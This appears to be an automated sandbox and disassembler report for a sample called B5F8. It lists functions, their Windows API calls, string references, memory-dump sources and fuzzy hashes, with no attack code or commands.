Instruction ID: d532d441e19495b57cb34d138c3e0c88a0b377879b543fee6e4065129139ec29
Opcode Fuzzy Hash: 980d6eea7b664cab60e6d86db1e8d11ee68504ae67a5a5b0083e142dd03a954a
Instruction Fuzzy Hash: 37F027B160020997EB18E7E08D027BF7374AF00304F04847EA911E2340FB7CD605819A

Function 00408D80 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(?,00408C9B,00000000,?,?,00000000), ref: 00408D92
std::exception::exception.LIBCMT ref: 00408DAD
__CxxThrowException@8.LIBCMT ref: 00408DC2

Strings

Pv@, xrefs: 00408DBB
PC, xrefs: 00408DB7, 00408DA3, 00408DBA

Memory Dump Source

Source File: 00000002.00000002.2358062136.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2358062136.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_B5F8.jbxd

Yara matches

Similarity

API ID: ??2@Exception@8Throwstd::exception::exception
String ID: Pv@$PC
API String ID: 3448701045-1362088297
Opcode ID: b42475b819e5296bc50c64d31f11e30ed0ca5ba6e695ecad0727ff97edcd75c6
Instruction ID: c1c2e9470fcfd07362e0a09b01d9ac21ad58a2ed8b2a4eb6edd2c0a09cf1513b
Opcode Fuzzy Hash: b42475b819e5296bc50c64d31f11e30ed0ca5ba6e695ecad0727ff97edcd75c6
Instruction Fuzzy Hash: 9AE02B7050030A97CB18F7B59D016BF73789F10304F40476FE965A22C1EF798504859D

Function 021A8FE7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(?,021A8F02,00000000,?,?,00000000), ref: 021A8FF9
std::exception::exception.LIBCMT ref: 021A9014
__CxxThrowException@8.LIBCMT ref: 021A9029

Strings

PC, xrefs: 021A900A, 021A901E, 021A9021
PC, xrefs: 021A9022

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: ??2@Exception@8Throwstd::exception::exception
String ID: PC$PC
API String ID: 3448701045-3524912142
Opcode ID: b42475b819e5296bc50c64d31f11e30ed0ca5ba6e695ecad0727ff97edcd75c6
Instruction ID: 64952093ef2f3d29af99f8655edfed2f9ed82d8f784ac140a18423ae797788f1
Opcode Fuzzy Hash: b42475b819e5296bc50c64d31f11e30ed0ca5ba6e695ecad0727ff97edcd75c6
Instruction Fuzzy Hash: E2E061789402095BDB24FFB48D116BFB37CDF00354F10475DD92652180EBB0810586D5

Function 021B7E76 Relevance: 7.9, APIs: 5, Instructions: 367stringCOMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(?,00638AAC), ref: 021B79D7
StrCmpCA.SHLWAPI(?,00638C1C), ref: 021B7AAF
lstrcpy.KERNEL32(00000000,0042D01C), ref: 021B7AE7
lstrcpy.KERNEL32(00000000,?), ref: 021B7B44

Part of subcall function 021C74A7: lstrcpy.KERNEL32(00000000), ref: 021C74C1

Part of subcall function 021A1677: lstrcpy.KERNEL32(00000000,?), ref: 021A169E
Part of subcall function 021A1677: lstrcpy.KERNEL32(00000000,?), ref: 021A16C0
Part of subcall function 021A1677: lstrcpy.KERNEL32(00000000,?), ref: 021A16E2
Part of subcall function 021A1677: lstrcpy.KERNEL32(00000000,?), ref: 021A1746

Part of subcall function 021B5E47: lstrcpy.KERNEL32(00000000,0042D01C), ref: 021B5E7C
Part of subcall function 021B5E47: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 021B5EAB
Part of subcall function 021B5E47: lstrcpy.KERNEL32(00000000,00000000), ref: 021B5EDC
Part of subcall function 021B5E47: lstrcpy.KERNEL32(00000000,00000000), ref: 021B5F04
Part of subcall function 021B5E47: lstrcat.KERNEL32(00000000,00000000), ref: 021B5F0F
Part of subcall function 021B5E47: lstrcpy.KERNEL32(00000000,00000000), ref: 021B5F37

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcpy$FolderPathlstrcat
String ID:
API String ID: 2938889746-0
Opcode ID: 2bebba6af289712f080de957bcbf78d05df3d434af1be4e71e032b38b9078c2a
Instruction ID: 50bb24aeba9b267da9cd3532ed3c9b398cb67588cda1a27b2cb1695709462a79
Opcode Fuzzy Hash: 2bebba6af289712f080de957bcbf78d05df3d434af1be4e71e032b38b9078c2a
Instruction Fuzzy Hash: 3CF15175E002058FDB25DF28C944A99B7B2BF88324F19C1ADD809AB3E1D771E942CF91

Function 021B7A84 Relevance: 7.9, APIs: 5, Instructions: 365stringCOMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(?,00638AAC), ref: 021B79D7
StrCmpCA.SHLWAPI(?,00638C1C), ref: 021B7AAF
lstrcpy.KERNEL32(00000000,0042D01C), ref: 021B7AE7
lstrcpy.KERNEL32(00000000,?), ref: 021B7B44
StrCmpCA.SHLWAPI(?,00638D84), ref: 021B7DE4

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: d89e5a93b16780a4945d7001f8fe04c944c6bc261c0c89bfee13aa78266d6684
Instruction ID: a8e1b8c1ed5bc8d46415a277a0ed8592b02f7eab727d44dc6ea73a8d20c017ed
Opcode Fuzzy Hash: d89e5a93b16780a4945d7001f8fe04c944c6bc261c0c89bfee13aa78266d6684
Instruction Fuzzy Hash: D0F15175E002058FDB25DF28C944A99B7B2BF89324F19C1ADD809AB3A1D771E942CF91

Function 021A9F37 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 123memorystringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000), ref: 021A9F6F
LocalAlloc.KERNEL32(00000040,?), ref: 021A9FA1
StrStrA.SHLWAPI(00000000,004351E8), ref: 021A9FCA
memcmp.MSVCRT(?,0042DC44,00000005), ref: 021AA003

Strings

, xrefs: 021AA02C

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: AllocLocallstrcpymemcmp
String ID:
API String ID: 4154055062-3916222277
Opcode ID: 57f8e19cb4e75aecd9d06e79b2a2f29f70109d821a836c89033672d7bb62ba8e
Instruction ID: e33a97aefbc3965376ccded6dd614b0a2a247e149ec742592eacc4aa8f1bd42c
Opcode Fuzzy Hash: 57f8e19cb4e75aecd9d06e79b2a2f29f70109d821a836c89033672d7bb62ba8e
Instruction Fuzzy Hash: FE41C379A402499FCB20EF74CDA1AAE7BB6BF45308F044568EC55E7251DB31ED41CB90

Function 021C965F Relevance: 7.6, APIs: 5, Instructions: 93COMMON

Download Yara Rule

APIs

IsValidCodePage.KERNEL32 ref: 021C9697
GetCPInfo.KERNEL32(?,?), ref: 021C96AA
memset.MSVCRT ref: 021C96C2
setSBUpLow.LIBCMT ref: 021C9798

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: CodeInfoPageValidmemset
String ID:
API String ID: 703783727-0
Opcode ID: 6eab46f699b87600043b982b3256ab625c67c80558f36cc1ccd8bbca43d4f8ed
Instruction ID: 86055dd7c4eed19b0c0ecf9761f7d607e7011aef94a2274dab448ca6f6f5faf4
Opcode Fuzzy Hash: 6eab46f699b87600043b982b3256ab625c67c80558f36cc1ccd8bbca43d4f8ed
Instruction Fuzzy Hash: 61312879A853918FD7259F74C88437ABFA09F21314F2849BED891DB1D2C729C406CB91

Function 00421B00 Relevance: 7.6, APIs: 5, Instructions: 66timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00421E28), ref: 00421B52

Part of subcall function 00421800: lstrcpy.KERNEL32(00000000,0042D01C), ref: 0042182F
Part of subcall function 00421800: lstrlenA.KERNEL32(00917328,00000000,00000000,?,?,00421B61), ref: 00421840
Part of subcall function 00421800: lstrcpy.KERNEL32(00000000,00000000), ref: 00421867
Part of subcall function 00421800: lstrcatA.KERNEL32(00000000,00000000), ref: 00421872
Part of subcall function 00421800: lstrcpy.KERNEL32(00000000,00000000), ref: 004218A1
Part of subcall function 00421800: lstrlenA.KERNEL32(00435564,?,?,00421B61), ref: 004218B3
Part of subcall function 00421800: lstrcpy.KERNEL32(00000000,00000000), ref: 004218D4
Part of subcall function 00421800: lstrcatA.KERNEL32(00000000,00435564,?,?,00421B61), ref: 004218E0
Part of subcall function 00421800: lstrcpy.KERNEL32(00000000,00000000), ref: 0042190F

sscanf.NTDLL ref: 00421B7A
SystemTimeToFileTime.KERNEL32(?,?), ref: 00421B96
SystemTimeToFileTime.KERNEL32(?,?), ref: 00421BA6
ExitProcess.KERNEL32 ref: 00421BC3

Memory Dump Source

Source File: 00000002.00000002.2358062136.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2358062136.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_B5F8.jbxd

Yara matches

Similarity

API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
String ID:
API String ID: 3040284667-0
Opcode ID: a2f6735c031ea2f4695345a85905500a2208e9f846abe19c5e0427cdd94a5bb9
Instruction ID: 74431add482d266e5f481d4c3f26529432deb7ac332c40e3c7ddf6828a7bb522
Opcode Fuzzy Hash: a2f6735c031ea2f4695345a85905500a2208e9f846abe19c5e0427cdd94a5bb9
Instruction Fuzzy Hash: BD2102B1508301AF8344EF69D88485BBBF9EFD8304F409A1EF5A9C3220E774E5048FA6

Function 021C3337 Relevance: 7.6, APIs: 5, Instructions: 61registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 021C336D
RtlAllocateHeap.NTDLL(00000000), ref: 021C3374
RegOpenKeyExA.ADVAPI32(80000002,006389D4,00000000,00020119,?), ref: 021C3393
RegQueryValueExA.ADVAPI32(?,00638CEC,00000000,00000000,00000000,000000FF), ref: 021C33AE
RegCloseKey.ADVAPI32(?), ref: 021C33B8

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: 49ee177b7729dda60db32b2962d7b5bd1a3cc4ed7fca1f7095805fab15dd51ff
Instruction ID: b341856f1dfd6cef7fcd07d3dfd45f0e702a30fbd18a8401f153e43d0185cba0
Opcode Fuzzy Hash: 49ee177b7729dda60db32b2962d7b5bd1a3cc4ed7fca1f7095805fab15dd51ff
Instruction Fuzzy Hash: 35118272A44204AFD714CB94DC45FABBB7DEB48711F10411AFA05D3280DB7459048BE1

Function 00406E30 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 50memoryCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,?,00000040), ref: 00406E40
memcpy.MSVCRT(?,00005A4D,000000F8), ref: 00406E7C
GetProcessHeap.KERNEL32(00000008,?), ref: 00406EB4
HeapAlloc.KERNEL32(00000000), ref: 00406EBB

Strings

@, xrefs: 00406E30

Memory Dump Source

Source File: 00000002.00000002.2358062136.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2358062136.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_B5F8.jbxd

Yara matches

Similarity

API ID: Heapmemcpy$AllocProcess
String ID: @
API String ID: 1643994569-2766056989
Opcode ID: 9d0aa672cad1b422e85df3b0c0ffa8adf9295387143c5de3d490c1a63fad8456
Instruction ID: b28c2e2eafd009aece7dfa75dd6d3a6e0d6a1e6899dabcaa8fc792e54f3dbcc7
Opcode Fuzzy Hash: 9d0aa672cad1b422e85df3b0c0ffa8adf9295387143c5de3d490c1a63fad8456
Instruction Fuzzy Hash: 9C1161706007129BEB258B61DC84BB773E4EB40701F454439EA47DB684FFB8D950CB99

Function 021C2B17 Relevance: 7.5, APIs: 5, Instructions: 49registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 021C2B2C
RtlAllocateHeap.NTDLL(00000000), ref: 021C2B33
RegOpenKeyExA.ADVAPI32(80000002,00638B98,00000000,00020119,021C2AB0), ref: 021C2B52
RegQueryValueExA.ADVAPI32(021C2AB0,0043565C,00000000,00000000,00000000,000000FF), ref: 021C2B6C
RegCloseKey.ADVAPI32(021C2AB0), ref: 021C2B76

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: 5b7eb5e49a2e4e8c4d8cd3c54b8221332289a025f50f89e1be766efa374635ab
Instruction ID: 8dcc33d8af6d348d5c465e0f25a288130177377ba62baccedc80f1c7dc13f6e0
Opcode Fuzzy Hash: 5b7eb5e49a2e4e8c4d8cd3c54b8221332289a025f50f89e1be766efa374635ab
Instruction Fuzzy Hash: ED019A79A40358AFE324DBA09C59FEB7BB9AB48755F200098FE4597241EB7059088BA0

Function 021A1267 Relevance: 7.5, APIs: 5, Instructions: 37registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 021A127C
RtlAllocateHeap.NTDLL(00000000), ref: 021A1283
RegOpenKeyExA.ADVAPI32(80000001,00431D24,00000000,00020119,?), ref: 021A12A0
RegQueryValueExA.ADVAPI32(?,00431D18,00000000,00000000,00000000,000000FF), ref: 021A12BA
RegCloseKey.ADVAPI32(?), ref: 021A12C4

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: c6adfcbbf362e72c312c20df80564037ba3fc04d8fe2fd2ec6ad55297d477a0e
Instruction ID: a85190ecb06bba645b4de2ed197cd77af13370a48ff2d2b280bf414b484b59ef
Opcode Fuzzy Hash: c6adfcbbf362e72c312c20df80564037ba3fc04d8fe2fd2ec6ad55297d477a0e
Instruction Fuzzy Hash: 52F09079A40308BFD7049BE09C4DFEB7B7DEB04755F100059BE05E2280D7B05A048BE0

Function 021C9268 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 021C9274

Part of subcall function 021C8A96: __getptd_noexit.LIBCMT ref: 021C8A99
Part of subcall function 021C8A96: __amsg_exit.LIBCMT ref: 021C8AA6

__getptd.LIBCMT ref: 021C928B
__amsg_exit.LIBCMT ref: 021C9299
__lock.LIBCMT ref: 021C92A9
__updatetlocinfoEx_nolock.LIBCMT ref: 021C92BD

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 597a1c53584a699b3bced9a2b76091cfa842eeb3be3d7ba8d5d4667430613e89
Instruction ID: cac0ce2d582ebfe7396e44aa4140899884077d90c4e3c5625093d1cfc74ae4d5
Opcode Fuzzy Hash: 597a1c53584a699b3bced9a2b76091cfa842eeb3be3d7ba8d5d4667430613e89
Instruction Fuzzy Hash: 20F0B43E9C47009FD731BB785C01B6D73A1AF20B20F35010DD495A75D4DBA89901DF5A

Function 00423E10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 124stringtimeCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,0042D01C), ref: 00423E45
lstrcpy.KERNEL32(00000000,00919518), ref: 00423E6F
GetSystemTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,00404D2A,?,00000014), ref: 00423E79

Strings

*M@, xrefs: 00423EEE, 00423EDD

Memory Dump Source

Source File: 00000002.00000002.2358062136.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2358062136.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcpy$SystemTime
String ID: *M@
API String ID: 684065273-4186991356
Opcode ID: b737b09e2fdb8671383c258246ff60179fc49d3e631dd6ba07feedc772b9d3db
Instruction ID: b70439790c50c5c6328432dc7e4028cf2044113f60d486d5e56dbf02b5324992
Opcode Fuzzy Hash: b737b09e2fdb8671383c258246ff60179fc49d3e631dd6ba07feedc772b9d3db
Instruction Fuzzy Hash: 76418D31E012158FDB14CF29E984666BBF5FF08315B4A80AAE845DB3A2C779DD42CF94

Function 00417CA0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 124COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00417D14
std::_Xinvalid_argument.LIBCPMT ref: 00417D2F
memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,004091B6,?,?,?,?,00000000,?,00001000,?), ref: 00417D84

Part of subcall function 00417DC0: std::_Xinvalid_argument.LIBCPMT ref: 00417DD8
Part of subcall function 00417DC0: std::_Xinvalid_argument.LIBCPMT ref: 00417DF6
Part of subcall function 00417DC0: std::_Xinvalid_argument.LIBCPMT ref: 00417E11
Part of subcall function 00417DC0: memcpy.MSVCRT(?,?,?,00000000,?,?,00417CFA,00000000,?,?,00000000,?,004091B6,?), ref: 00417E74

Strings

string too long, xrefs: 00417D0F, 00417D2A

Memory Dump Source

Source File: 00000002.00000002.2358062136.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2358062136.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2358062136.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_B5F8.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_$memcpy
String ID: string too long
API String ID: 2304785028-2556327735
Opcode ID: 0ad792144046ffbf41b4b7ef80e437f4da1d35d54c52f48ee7f6e03587a049cb
Instruction ID: cceaebfc163d96aa0f8494b9eac0357faa14b69c3768ea23588e1796d2ee1bc6
Opcode Fuzzy Hash: 0ad792144046ffbf41b4b7ef80e437f4da1d35d54c52f48ee7f6e03587a049cb
Instruction Fuzzy Hash: 0F31E5723086148BD7249E6CF880ABBF7F9EF91764B204A2BF14687741D775988183ED

Function 021BF247 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 021BF27A
StrCmpCA.SHLWAPI(?,ERROR), ref: 021BF295
lstrcpy.KERNEL32(00000000,ERROR), ref: 021BF2F6

Strings

ERROR, xrefs: 021BF28F, 021BF2F0

Memory Dump Source

Source File: 00000002.00000002.2358623419.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_21a0000_B5F8.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID: ERROR
API String ID: 3722407311-2861137601
Opcode ID: da32503694cbb92f39706253748ceac56d5574eca248915fa64637d0a76e0128
Instruction ID: 390747e1757fa3e7b776b25531a86f0a45e823770ed24d4cea9419841e66fa70
Opcode Fuzzy Hash: da32503694cbb92f39706253748ceac56d5574eca248915fa64637d0a76e0128
Instruction Fuzzy Hash: AA21F7B8B912869FCB25BF78CC54A993BE6AF04308F004964F859DBA51DB34E911DB90

Function 00408740 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00408767

Part of subcall function 0042A1A3: std::exception::exception.LIBCMT ref: 0042A1B8
Part of subcall function 0042A1A3: __CxxThrowException@8.LIBCMT ref: 0042A1CD

Strings

yxxx, xrefs: 00408771
yxxx, xrefs: 00408749
vector<T> too long, xrefs: 00408762

Memory Dump Source

